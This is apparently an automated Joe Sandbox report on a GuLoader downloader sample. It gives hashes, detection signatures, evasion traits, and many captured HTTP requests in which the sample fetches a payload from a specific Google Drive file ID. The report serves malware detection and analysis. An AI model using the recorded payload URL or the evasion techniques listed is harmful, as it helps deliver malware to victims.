Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eAvqHiIsgR.exe

Overview

General Information

Sample name:eAvqHiIsgR.exe
renamed because original name is a hash value
Original sample name:e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7.exe
Analysis ID:1567591
MD5:61518cfded3109fac04ee916ab275c26
SHA1:c624a4ee78183d82fb8264f74953d32ddcae5481
SHA256:e67d5a5be1e0f1033957b79737340afe9889998f6c2db786144b415ddf202ee7
Tags:exeGuLoadersigneduser-adrian__luca
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • eAvqHiIsgR.exe (PID: 2000 cmdline: "C:\Users\user\Desktop\eAvqHiIsgR.exe" MD5: 61518CFDED3109FAC04EE916AB275C26)
    • eAvqHiIsgR.exe (PID: 2200 cmdline: "C:\Users\user\Desktop\eAvqHiIsgR.exe" MD5: 61518CFDED3109FAC04EE916AB275C26)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.4521613318.00000000021F4000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000002.3670179410.0000000003404000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-03T17:24:46.747488+010028032702Potentially Bad Traffic192.168.2.549883172.217.19.174443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: eAvqHiIsgR.exeAvira: detected
      Source: eAvqHiIsgR.exeReversingLabs: Detection: 60%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: eAvqHiIsgR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49883 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49891 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49922 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49937 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49950 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49952 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49954 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49955 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49955 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49956 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49957 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49958 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49961 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49963 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49965 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49967 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49968 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49969 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49970 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49972 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49975 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49976 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49977 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49979 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49983 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49985 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49987 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49989 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.5:49990 version: TLS 1.2
      Source: eAvqHiIsgR.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: eAvqHiIsgR.exe, 00000005.00000001.3014050389.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\eAvqHiIsgR.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49883 -> 172.217.19.174:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
      Source: global trafficHTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
